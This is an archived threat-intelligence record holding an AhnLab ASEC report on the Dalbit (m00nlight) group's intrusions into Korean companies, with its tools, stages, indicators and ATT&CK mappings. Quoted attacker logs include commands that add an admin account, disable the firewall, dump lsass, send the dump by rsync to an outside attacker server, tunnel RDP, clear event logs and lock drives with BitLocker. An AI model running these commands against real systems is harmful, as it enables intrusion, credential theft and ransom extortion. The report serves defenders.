{
	"id": "b16b8f36-455e-4a38-9852-252c5962f39d",
	"created_at": "2026-04-06T00:07:56.880578Z",
	"updated_at": "2026-04-10T13:13:07.400269Z",
	"deleted_at": null,
	"sha1_hash": "47b8da3bea0c3580d92023398518498a0e33c21a",
	"title": "Dalbit (m00nlight): Chinese Hacker Group's APT Attack Campaign - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1029528,
	"plain_text": "Dalbit (m00nlight): Chinese Hacker Group's APT Attack Campaign - ASEC\r\nBy ATCP\r\nPublished: 2023-02-13 · Archived: 2026-04-05 13:58:17 UTC\r\n0. Overview\r\nThis report is a continuation of the “Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies” post that was\r\nuploaded on August 16, 2022 and follows the group’s activities since that post.\r\nThis group has always relied on open-source tools and lacked any distinct characteristics to profile them due to the lack of\r\nPDB information. Additionally, the amount of information that could be collected was limited unless the affected Korean\r\ncompanies specifically asked for an investigation since the threat actor’s C2 (Command\u0026Control) server abused the servers\r\nof the Korean companies. However, after the post was uploaded and a portion of the Korean company servers used by the\r\nthreat actor were blocked, the threat actor began to use a hosting server called “*.m00nlight.top” as their C2 and download\r\nserver. Thus, the ASEC team decided to call this group Dalbit (m00nlight.top) after the Korean word for ‘Moonlight’.\r\nThis group has had more than 50 confirmed attack attempts on Korean companies since 2022. Most of the attacked\r\ncompanies were mid to small companies while a portion was major companies. The team has confirmed that 30% of the\r\ninfected companies were using a certain Korean groupware solution. 
It is currently difficult to check whether this groupware\r\nproduct has a vulnerability or not, but if a server that is this exposed has a vulnerability, then there is a chance that\r\ncompanies could be affected gravely through the leakage of confidential information and ransomware behavior.\r\nFurthermore, this Dalbit group leaves some infected companies as proxies and download servers to later use them as means\r\nto communicate with the threat actor upon infiltration of another company.\r\nTherefore, we strongly recommend performing an internal security check if users suspect that they have been attacked by\r\nthis Dalbit group. The team asks that users send a report to AhnLab and take preemptive measures to prevent secondary\r\nharm and potential damage to other companies.\r\n1. Affected Korean Companies (Industry Type)\r\nListed below are the 50 companies that were confirmed to have been affected since 2022. Companies that have not been\r\nclearly confirmed were excluded from this list. It is possible that more companies could have been affected.\r\nFigure 1. 
Industry types of companies that the Dalbit group tried to attack\r\nThe following are the descriptions of each industry type.\r\nTechnology: Companies that handle software or hardware\r\nIndustrial: Manufacturing companies that handle machinery, paint jobs, steel, metals, etc.\r\nChemical: Cosmetic, pharmaceutical, and plastic companies\r\nConstruction: Associations or organizations related to construction or construction companies\r\nAutomobile: Automobile-related manufacturing companies\r\nSemiconductor: Semiconductor-related manufacturing companies \r\nEducation: Educational companies\r\nWholesale: Wholesalers\r\nMedia: Printing and media companies\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 1 of 16\n\nFood: Food companies\r\nShipping: Shipping companies\r\nHospitality: Leisure or tourist accommodation companies\r\nEnergy: Energy companies\r\nShipbuilding: Shipbuilding companies\r\nConsulting: Management consulting companies\r\n2. Flow and Characteristics\r\n2.1. Summary Diagram\r\nFigure 2. Summary diagram of Dalbit group’s infiltration process\r\nThe above diagram shows the threat actor’s infiltration process into Company B. A brief summary of this flow is in the table\r\nbelow.\r\n1) Initial Access\r\nThe threat actor targets web servers or SQL servers, which they gain access to by exploiting\r\nvulnerabilities. They then attempt to control the systems with tools such as WebShell.\r\n2) Command \u0026 Control\r\nVarious hacking tools are downloaded through WebShell. 
Hacking tools include various binaries such\r\nas privilege escalation tools, proxy tools, and network scanning tools.\r\n3) Proxy \u0026 Internal Reconnaissance\r\nProxy: The threat actor installs a proxy tool such as FRP (Fast Reverse Proxy) before attempting to\r\nconnect to 2-1) a hosting server built by the threat actor or 2-2) another previously infected company’s\r\nserver (Company A) via Remote Desktop (RDP).\r\nInternal Reconnaissance: Tools such as network scanning tools and account theft tools are used for\r\ninternal reconnaissance and obtaining information.\r\n4) Lateral Movement\r\nThe obtained information is used to move to another connectible server or PC. Afterward, a proxy tool\r\n(FRP) is also installed on the PC that has successfully been reached through lateral movement, creating\r\nan environment which allows the threat actor to connect via RDP. The required privilege level is then\r\nacquired by either adding a specific account or through a credential theft tool like Mimikatz.\r\n5) Impact\r\nUltimately, after the threat actor steals all the information they desire, they use BitLocker to lock\r\ncertain drives and demand a ransom.\r\nTable 1. Explanation of the infiltration summary diagram\r\nThe following are major characteristics of the Dalbit group.\r\n2.2. 
Characteristics of Dalbit\r\nThreat Actor’s C2 Servers: Download and C2 (Command\u0026Control) servers are Korean company or hosting servers. Over half of these servers are exploited Korean company servers. *.m00nlight.top or IP format addresses are often used for the hosting servers.\r\nAttempts Control Through RDP: Usually attempts to access RDP after infection. Either a proxy tool or Gotohttp is used for the RDP connection.\r\nProxy Tools: Major proxy tools used include FRP, LCX (Htran), NPS, ReGeorg, etc.\r\nAdd User Account: A net command is used to add an account. Account credentials (ID: “main” / PW: “ff0.123456”).\r\nOpen-source Tool: Mostly uses open-source tools that are publicly available. A lot of tools are written in Chinese.\r\nEvasion: VMProtect is used to prevent hacking tools from being detected. Security event logs are deleted.\r\nExtorted Information: User account credentials, email information, screen leak, installed program information.\r\nTable 2. Characteristics of Dalbit\r\n3. Tools Used and Infiltration Process\r\n3.1. 
Tools and Malware Used\r\nWebShell: Godzilla, ASPXSpy, AntSword, China Chopper\r\nDownloader: Certutil (Windows CMD), Bitsadmin (Windows CMD)\r\nPrivilege Escalation: BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato, CVE-2018-8639, CVE-2019-1458\r\nProxy: FRP, LCX, NPS, ReGeorg\r\nInternal Reconnaissance: FScan, NbtScan, TCPScan, Goon, Nltest (Windows CMD)\r\nLateral Movement / Information Leak and Collection: RDP, PsExec, RemCom, Winexec, Wevtutil (Windows CMD), WMI (Windows CMD), ProcDump, Dumpert, EML Extractor (created), Mimikatz, Rsync\r\nBackdoor: CobaltStrike, MetaSploit, BlueShell, Ladon\r\nFile Encryption: BitLocker (Windows CMD)\r\nEvasion: Security log deletion (Windows CMD), Firewall OFF (Windows CMD), Attempts to delete AV products, VMProtect Packing\r\nTable 3. Malware and hacking tools used by Dalbit\r\nOnly one tool for leaking emails seems to have been made by the group themselves. The rest are normal Windows programs\r\nor tools that can easily be found online.\r\n3.2. Infiltration Process\r\n3.2.1. Initial Infiltration\r\nIt is assumed that their attack targets are usually servers with a specific Korean groupware installed on them, email servers\r\n(Exchange Server), and SQL servers. The threat actor exploited either file upload vulnerabilities or WebLogic vulnerabilities\r\nsuch as CVE-2017-10271 to upload their WebShell. A portion appeared to have used a SQL server command prompt\r\n(xp_cmdshell).\r\nThe most frequently used WebShells are Godzilla, ASPXSpy, AntSword, and China Chopper in that order. 
Aside from these,\r\nseveral other WebShells were also found.\r\nThe installation paths of the WebShells are as follows.\r\n– Job recruitment (File upload vulnerability)\r\nD:\\WEB\\********recruit\\css\\1.ashx\r\nD:\\WEB\\********recruit\\css\\4.ashx\r\nD:\\WEB\\********recruit\\common\\conf.aspx\r\n…\r\n– File upload vulnerability\r\nD:\\UploadData\\***********\\****_File\\Data\\Award\\1.ashx\r\nD:\\UploadData\\***********\\****_File\\Data\\Award\\2.aspx\r\nD:\\UploadData\\***********\\****_File\\Data\\Award\\3.aspx\r\nD:\\**WebService\\********\\*****Editor\\sample\\photo_uploader\\File\\conf.aspx\r\nD:\\**WebService\\********_ThesisSubmission\\Include\\file.aspx\r\n…\r\n– Certain groupware\r\nD:\\Web\\(Groupware)\\cop\\1.ashx\r\nD:\\Web\\(Groupware)\\app\\4.ashx\r\nD:\\Web\\(Groupware)\\bbs\\4.asmx\r\nD:\\Web\\(Groupware)\\erp\\tunnel.aspx (ReGeorg)\r\nD:\\inetpub\\(Groupware)\\image\\2.asmx\r\nD:\\inetpub\\(Groupware)\\image\\2.aspx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\conf.aspx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\1.ashx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\1.asmx\r\nC:\\(Groupware)\\Web\\(Groupware)\\cop\\1.aspx\r\n…\r\n– Email server (Exchange Server)\r\nD:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\aa.aspx\r\nD:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\11.aspx\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\root\\91080f08\\2694eff0\\app_web_defaultwsdlhelpgenerator.aspx.cdcab7d2.sjx_41yb.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\root\\91080f08\\2694eff0\\app_web_ldaj2kwn.dll\r\n…\r\n– Weblogic\r\n
D:\\***\\wls1035\\domains\\************\\servers\\*******\\tmp\\************\\uddiexplorer\\gcx62x\\war\\modifyregistryhelp.jsp\r\nD:\\***\\wls1035\\domains\\************\\servers\\*******\\tmp\\************\\wls-wsat\\zfa3iv\\war\\eee.jsp\r\nD:\\***\\wls1035\\domains\\************\\servers\\*******\\tmp\\************\\wls-wsat\\zfa3iv\\war\\error.jsp\r\nD:\\Oracle\\**********\\user_projects\\domains\\*************\\servers\\WLS_FORMS\\tmp\\************\\wls-wsat\\tcsxmg\\war\\123.jsp\r\nD:\\Oracle\\**********\\user_projects\\domains\\*************\\servers\\WLS_FORMS\\tmp\\************\\wls-wsat\\tcsxmg\\war\\test.jsp\r\nD:\\Oracle\\**********\\user_projects\\domains\\*************\\servers\\WLS_FORMS\\tmp\\************\\wls-wsat\\tcsxmg\\war\\aaa.jsp\r\n…\r\n– Tomcat\r\nC:\\(Tomcat)\\webapps\\dd\\sb.jsp\r\nC:\\(Tomcat)\\webapps\\ddd\\index.jsp\r\nC:\\(Tomcat)\\webapps\\docs\\update.jsp\r\nC:\\(Tomcat)\\webapps\\tmp\\shell.jsp\r\nTable 4. Paths where WebShells were uploaded\r\n3.2.2. Download\r\nThe threat actor downloads other hacking tools through default Windows programs. Since WebShells are normally used for\r\ninfiltration, the parent processes (excluding command processes like cmd) are web server processes such as w3wp.exe,\r\njava.exe, sqlserver.exe, and tomcat*.exe. The downloaded files include privilege escalation tools, proxy tools, and network\r\nscanning tools, all of which are required by the threat actor. The download command is as follows.\r\n(Additionally, the full addresses of the Korean companies that have been exploited will not be disclosed.)\r\n1) Certutil\r\nTable 5. Certutil download log\r\n2) Bitsadmin\r\nTable 6. Bitsadmin download log\r\nThe hacking tools and malware downloaded by the threat actor were usually found in the following paths. 
\r\n%ALLUSERSPROFILE%\r\n%SystemDrive%\\temp\r\n%SystemDrive%\\perflogs\r\n%SystemDrive%\\nia\r\n%SystemDrive%\\.tmp\r\n%SystemRoot%\r\n%SystemRoot%\\debug\r\n%SystemRoot%\\temp\r\nTable 7. Major directories used by the Dalbit group\r\nTherefore, the files in these paths should be checked if users suspect that they have been infiltrated.\r\n3.2.3. Privilege Escalation and Account Addition\r\nThe threat actor mainly used Potato variants (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato) and PoCs\r\n(CVE-2018-8639, CVE-2019-1458) that have been published on GitHub for privilege escalation. After privilege escalation, they\r\ncharacteristically add the following account.\r\nThe sp.exe below is the SweetPotato tool.\r\n\u003e sp.exe “whaomi” (Privilege check)\r\n\u003e sp.exe “netsh advfirewall set allprofiles state off” (Firewall OFF)\r\n\u003e sp.exe “net user main ff0.123456 /add \u0026 net localgroup administrators main /add” (Add account)\r\nTable 8. SweetPotato usage log\r\nThe point of focus here is the name of the account added by the threat actor. Threat actor accounts with the name “main”\r\nhave been found in other infiltrated company servers.\r\nAside from adding accounts, the threat actor would also use stolen admin accounts.\r\n\u003e wmic  /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$  process call create “cmd.exe /c\r\nc:\\temp\\s.bat”\r\nTable 9. Admin account execution log\r\n3.2.4. Proxy Settings\r\nAfter infiltrating a server, the threat actor initiates access via proxy to use RDP communications. FRP and LCX were the\r\nmainly used proxy tools, and there have been cases where ReGeorg, NPS, or RSOCKS was found in some companies.\r\nAdditionally, multiple proxy tools including FRP and LCX were found in one area of a certain company that was infiltrated.\r\nMultiple FRP configuration files (.ini) would also be discovered in cases where internal propagation had occurred. 
We\r\nbelieve that the threat actor installs additional FRPs and uses multiple configuration files when an accessible PC offers a lot to\r\ngain. Furthermore, the LCX used by this group has the same features as the open-source LCX, but its version is not the same\r\nas the one uploaded to GitHub, meaning that a binary privately compiled by a Chinese developer was used.\r\nProxy tools like FRP and LCX differ in terms of forwarding methods and supported protocols. However, since their\r\ndifferences, actual infection cases, recreation, and network packets have all been covered in the TI report, “Analysis Report\r\non Attack Cases Exploiting Various Remote Control Tools,” they will not be reiterated in this post.\r\n1) FRP (Fast Reverse Proxy)\r\nFRP configuration files (.ini) were found in all servers and PC devices infiltrated by this group. The following is an actual\r\ncase of an infiltrated company.\r\nFigure 3. FRPC configuration file (m00nlight.top) found in an infiltrated company\r\nIn particular, the Dalbit group usually used the Socks5 protocol to communicate. Socks5 is a session-layer (layer 5) protocol in\r\nthe 7-layer OSI model. It can handle various requests such as HTTP, FTP, and RDP since it sits between layers 4 and 7. Therefore, if\r\nthe threat actor uses a proxy connection tool that can handle Socks5, such as Proxifier, remote control through RDP becomes\r\npossible. If a connection can be established to an internal PC, lateral movement can also be achieved. Thus, if the\r\nconfiguration file is set to the Socks5 protocol, the threat actor has more freedom, as no additional modifications are\r\nrequired to handle various requests.\r\nFigure 4. Example of Socks5 usage\r\nThe following are FRP filenames and commands used by the threat actor. 
The list is in descending order from most to least\r\nused.\r\nFRP filenames\r\nupdate.exe\r\ndebug.exe\r\nmain.exe\r\ninfo.exe\r\nAgent.exe\r\nfrpc.exe\r\ntest.exe\r\nzabbix.exe\r\nwinh32.exe\r\ncmd.exe\r\nTable 10. FRP filenames\r\nFRP commands\r\n\u003e update.exe -c frpc.ini\r\n\u003e update.exe -c 8080.ini\r\n\u003e update.exe -c 8.ini\r\n\u003e info.zip -c frpc__8083.ini\r\n\u003e debug.exe -c debug.ini\r\n\u003e debug.exe -c debug.log\r\n\u003e debug.exe -c debug.txt\r\n\u003e frpc.exe -c frpc__2381.ini\r\n\u003e cmd.exe /c c:\\temp\\****\\temp\\frpc.ini\r\n…\r\nTable 11. FRP execution log\r\nIn certain companies, the FRP was registered to the task scheduler (schtasks) under the name “debug” to maintain its\r\npersistence. As shown in Table 12, the team confirmed the execution of a registered scheduled task.\r\n\u003e schtasks  /tn debug /run\r\nTable 12. Task scheduler execution log\r\n2) LCX (Htran)\r\nDalbit used an LCX (Htran) binary compiled by a certain Chinese person. This has the same features as the existing binary,\r\nbut it also includes the nickname of the binary creator.\r\nFigure 5. Screen that is displayed upon executing the LCX used by the Dalbit group (By 折羽鸿鹄)\r\nWe can confirm through this that the nickname of the person who had created the binary is “折羽鸿鹄” (QQ:56345566). It\r\nis highly unlikely that this developer is the threat actor in question; however, since this binary cannot be downloaded\r\nthrough a simple search online, it is assumed that the threat actor has a connection to China.\r\nThe installed filenames and executed commands are as follows:\r\nLCX filenames\r\nlcx3.exe\r\nlcx.exe\r\nupdate.exe\r\nTable 13. LCX filenames\r\nLCX commands\r\n\u003e update.exe -slave 1.246.***.*** 110 127.0.0.1 3389\r\n\u003e lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389\r\n…\r\nTable 14. LCX command log\r\nThe above LCX C2 is a Korean company server and has been concealed.\r\n3.2.5. 
Internal Reconnaissance\r\nFscan and NBTScan have been commonly used for network scans, but the usage of TCP Scan and Goon has also been\r\nconfirmed in some cases.\r\nGoon is a network scanning tool made with Golang that not only allows basic port scanning, but scanning for Tomcat,\r\nMSSQL, and MYSQL accounts as well. We can see that this tool was also written in Chinese.\r\nFigure 6. Screen that is displayed upon executing Goon\r\n3.2.6. Information Extortion\r\nLSASS dump information and EML files of certain accounts are usually the information that is stolen. It has also been\r\nconfirmed that, depending on the company, installed programs are checked through a WMIC command or a screenshot of the affected PC is sent to the\r\nthreat actor’s server at regular intervals.\r\n1) Credential Extraction (LSASS Dump)\r\nDepending on the target, the threat actor chose not to install Mimikatz and instead extracted credentials by dumping the\r\nlsass.exe process. Credentials can then be obtained from the dump file with tools like Mimikatz or\r\nPypykatz. Additionally, a detailed explanation of Mimikatz can be found in the\r\nTI report, “Analysis Report on Internal Web Spreading Methods Using Mimikatz”.\r\nThe following method is how the threat actor stole credentials without Mimikatz.\r\n1-1) Dumpert\r\nThe open-source Dumpert is an API hooking evasion tool that adapts to the target OS version and uses the\r\nMiniDumpWriteDump() API to dump the lsass.exe process. The threat actor modified the code to change the path of the\r\ndump file and remove features like log output.\r\nFigure 7. Left (open-source Dumpert) vs. 
right (Dumpert used by the Dalbit group)\r\nThe above figure shows that the two versions are the same aside from the different paths and the removal of the output\r\nstring.\r\nThe following table displays all of the “%SystemRoot%\\temp” dump file paths that have currently been found.\r\n%SystemRoot%\\temp\\duhgghmpert.dmp\r\n%SystemRoot%\\temp\\dumpert.dmp\r\n%SystemRoot%\\temp\\tarko.dmp\r\n%SystemRoot%\\temp\\lsa.txt\r\n…\r\nTable 15. Lsass dump file paths\r\n1-2) Procdump\r\nProcdump is a legitimate utility provided by Microsoft that offers a process dump feature. The threat actor\r\nperformed a dump like the one in Figure 8 with this tool.\r\nFigure 8. Output upon executing Procdump\r\nAfterward, the threat actor used a tool called Rsync (Remote Sync) to send the dump file to their own server. The following\r\nis an actual example of information theft attempted by the threat actor.\r\n\u003e svchost.exe -accepteula -ma lsass.exe web_log.dmp\r\n\u003e rsync  -avz --port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip\r\nTable 16. Procdump execution and rsync usage log\r\n2) Email Extraction\r\nFigure 9. Screen displayed upon executing email extraction tool\r\nThis sample is an email extraction tool developed with Golang and presumably the only known tool developed by the threat\r\nactor themselves. This tool offers the ability to target a company’s Exchange email server and extract a specific account’s\r\nemail with EWS (Exchange Web Service) as an EML file. Arguments include the Exchange server address, account name,\r\nNTLM password hash of said account, date and time, etc. 
When launched, the tool extracts every email from the mailboxes\r\nof the target account according to the time received as an argument and saves them as EML files.\r\nFor reference, the PDB information of this binary is “fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff” and is\r\nmeaningless.\r\nFigure 10. PDB information of the email extraction tool\r\n3) Screen Leak\r\nThe threat actor sent screenshots from certain PCs to their own server. While a binary that takes screenshots of the current\r\nscreen has not been found as of yet, the threat actor’s server where the infected PC’s screenshots were being sent has been\r\ndiscovered. Screenshots from a certain company’s infiltrated PC were sent every 5-10 seconds.\r\nOutgoing server of threat actor’s screenshots: hxxp://91.217.139[.]117:8080/1.bat\r\nFigure 11. Actual PC screenshot sent from a certain affected company\r\nOnly images were sent. The PC could not be controlled remotely and no audio was output either.\r\nAlso, the threat actor’s server (91.217.139[.]117) where the screenshots were being sent was also being used as a download\r\nserver for another company.\r\nTable 17. A different log from the threat actor’s server (91.217.139[.]117)\r\n4) Lookup Installed Programs and Login Information\r\nThe threat actor used a WMIC command to check installed programs.\r\n\u003e wmic product get name,version\r\nTable 18. How the threat actor looked up installed programs\r\nFigure 12. List of installed programs and command example (WMIC)\r\nFurthermore, the domain account credentials associated with certain event IDs in the event log were collected. The\r\ncreated file is saved in c:\\temp\\EvtLogon.dat.\r\nEvent ID Meaning\r\n4624 Login successful\r\n4768 Kerberos authentication request\r\n4776 NTLM authentication attempt\r\nTable 19. 
Meanings of the event IDs used by the threat actor\r\n\u003e wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true \u003e\u003e c:\\temp\\EvtLogon.dat\r\nTable 20. wevtutil command log\r\n3.2.7. File Encryption\r\nDetails about this matter have been covered in a past blog post. The threat actor used BitLocker, a Windows utility, to\r\nencrypt certain drives and demand ransoms. Currently, more affected companies are still being found.\r\nBitLocker commands\r\n\u003e “C:\\Windows\\System32\\BitLockerWizardElev.exe” F:\\ T\r\n\u003e manage-bde  -lock  -ForceDismount F:\r\n\u003e manage-bde  -lock  -ForceDismount e:\r\n\u003e “c:\\windows\\system32\\bitlockerwizardelev.exe” e:\\ t\r\n\u003e “c:\\windows\\system32\\bitlockerwizardelev.exe” f:\\ u\r\nTable 21. BitLocker log\r\nFigure 13 is the ransom note used by the threat actor. The threat actor used anonymous mailing services such as\r\nstartmail.com and onionmail.com.\r\nFigure 13. Ransom note that was shown in a previous blog post\r\nThe command assumed to be for downloading the ransom note is as follows.\r\nTable 22. Log assumed to display the ransom note being downloaded\r\n3.2.8. 
Evasion\r\n1) VMProtect Packing\r\nWhen a binary was detected after being uploaded, the threat actor packed it with VMProtect to try and avoid detection.\r\n– Privilege escalation tools\r\n%ALLUSERSPROFILE%\\badpotatonet4.exe\r\n%ALLUSERSPROFILE%\\BadPotatoNet4.vmp.exe\r\n%ALLUSERSPROFILE%\\SweetPotato.exe\r\n%ALLUSERSPROFILE%\\SweetPotato.vmp.exe\r\n%ALLUSERSPROFILE%\\jc.vmp.exe\r\n%SystemDrive%\\nia\\juicypotato.vmp1.exe\r\n%SystemDrive%\\nia\\juicypotato.vmp.exe\r\n…\r\n– Proxy tools\r\nE:\\WEB\\*****\\data\\frpc.vmp.exe\r\n%ALLUSERSPROFILE%\\lcx.exe\r\n%ALLUSERSPROFILE%\\lcx_VP.exe\r\n%SystemDrive%\\Temp\\lcx.exe\r\n%SystemDrive%\\Temp\\lcx_VP.exe\r\n%SystemDrive%\\Temp\\svchost.exe (FRP)\r\n%SystemDrive%\\Temp\\frpc.vmp.exe\r\n…\r\nTable 23. Files packed with VMProtect\r\n2) Windows Event Log Deletion Using Wevtutil\r\nRemoval of security event logs\r\n\u003e cmd.exe /c wevtutil cl security\r\nRemoval of application logs\r\n\u003e cmd.exe wevtutil.exe el\r\n\u003e cmd.exe wevtutil.exe cl “application”\r\nTable 24. Deletion of Windows event logs\r\n3) Firewall OFF\r\nsp.exe “netsh advfirewall set allprofiles state off”\r\nTable 25. Firewall OFF\r\n4. Conclusion\r\nThe Dalbit hacking group attempted attacks against vulnerable Korean company servers, and logs are being reported not\r\nonly from mid-sized and smaller businesses, but also from some large companies. In particular, 30% of the affected\r\ncompanies were found to have been using a certain Korean groupware product. Moreover, this group uses publicly available\r\ntools, from the WebShell used in the early stages to the ransomware used at the end. Among these tools, there is a proxy tool\r\nthat is assumed to have been obtained from a Chinese community, a tool with Chinese documentation, and a Chinese tool\r\nnot mentioned in this post. 
It can be assumed that the threat actor has at least a partial connection with China, considering\r\ntheir frequent usage of Chinese tools.\r\nIf a server admin suspects that their system has been infected, they are advised to check the IOCs below along with the\r\naforementioned download paths and the account name (“main”) often used by the threat actor. If suspicions are confirmed,\r\nit is advised to immediately report the situation to AhnLab in order to minimize additional harm. Furthermore, admins\r\nshould prevent vulnerability attacks by updating their servers to the newest version for vulnerability patches, and\r\nmaintenance is especially needed for servers that are open externally but not managed.\r\n5. IOC\r\nFor reference, the IP addresses of Korean company servers abused by the threat actor will not be disclosed on the ASEC\r\nblog.\r\nMITRE ATT\u0026CK\r\nExecution: Command and Scripting Interpreter (T1059), Windows Management Instrumentation (T1047), System Services (T1569)\r\nPersistence: Scheduled Task/Job (T1053), Create Account (T1136), Server Software Component (T1505), Account Manipulation (T1098)\r\nPrivilege Escalation: Access Token Manipulation (T1134), Exploitation for Privilege Escalation (T1068)\r\nCredential Access: OS Credential Dumping (T1003)\r\nDiscovery: Remote System Discovery (T1018), Network Service Discovery (T1046)\r\nDefense Evasion: Impair Defenses (T1562), Indicator Removal (T1070)\r\nLateral Movement: Remote Services, Lateral Tool Transfer\r\nTable 26. 
MITRE ATT\u0026CK\r\n[IOC]\r\nC2 and URL (Abused Korean company servers are not listed)\r\n– Download C2\r\n91.217.139[.]117\r\n– Upload C2\r\n205.185.122[.]95\r\n91.217.139[.]117\r\n– FRP \u0026 LCX C2\r\nhxxp://sk1.m00nlight[.]top:80 (45.136.186.19) //MOACK_Co_LTD company 
server\r\nhxxps://fk.m00nlight[.]top:443 (45.136.186.175:443) //MOACK_Co_LTD company server\r\nhxxps://aa.zxcss[.]com:443 (45.93.31.122) //MOACK_Co_LTD company server\r\n45.93.31[.]75:7777 //MOACK_Co_LTD company server\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 15 of 16\n\n45.93.28[.]103:8080 //MOACK_Co_LTD company server\r\n103.118.42[.]208\r\n101.43.121[.]50\r\n– Backdoor C2\r\n45.93.31[.]75 //MOACK_Co_LTD company server\r\nSubscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed\r\nanalysis information.\r\nSource: https://asec.ahnlab.com/en/47455/\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/47455/"
	],
	"report_names": [
		"47455"
	],
	"threat_actors": [
		{
			"id": "bcf899bb-34bb-43e1-929d-02bc91974f2a",
			"created_at": "2023-02-18T02:04:24.050644Z",
			"updated_at": "2026-04-10T02:00:04.639142Z",
			"deleted_at": null,
			"main_name": "Dalbit",
			"aliases": [],
			"source_name": "ETDA:Dalbit",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agentemis",
				"AntSword",
				"BadPotato",
				"BlueShell",
				"CHINACHOPPER",
				"China Chopper",
				"Cobalt Strike",
				"CobaltStrike",
				"EFSPotato",
				"FRP",
				"Fast Reverse Proxy",
				"Godzilla",
				"Godzilla Loader",
				"HTran",
				"HUC Packet Transmit Tool",
				"JuicyPotato",
				"LadonGo",
				"Metasploit",
				"Mimikatz",
				"NPS",
				"ProcDump",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"RottenPotato",
				"SinoChopper",
				"SweetPotato",
				"cobeacon",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7cf4ec85-806f-4fd7-855a-6669ed381bf5",
			"created_at": "2023-11-08T02:00:07.176033Z",
			"updated_at": "2026-04-10T02:00:03.435082Z",
			"deleted_at": null,
			"main_name": "Dalbit",
			"aliases": [],
			"source_name": "MISPGALAXY:Dalbit",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434076,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/47b8da3bea0c3580d92023398518498a0e33c21a.pdf",
		"text": "https://archive.orkl.eu/47b8da3bea0c3580d92023398518498a0e33c21a.txt",
		"img": "https://archive.orkl.eu/47b8da3bea0c3580d92023398518498a0e33c21a.jpg"
	}
}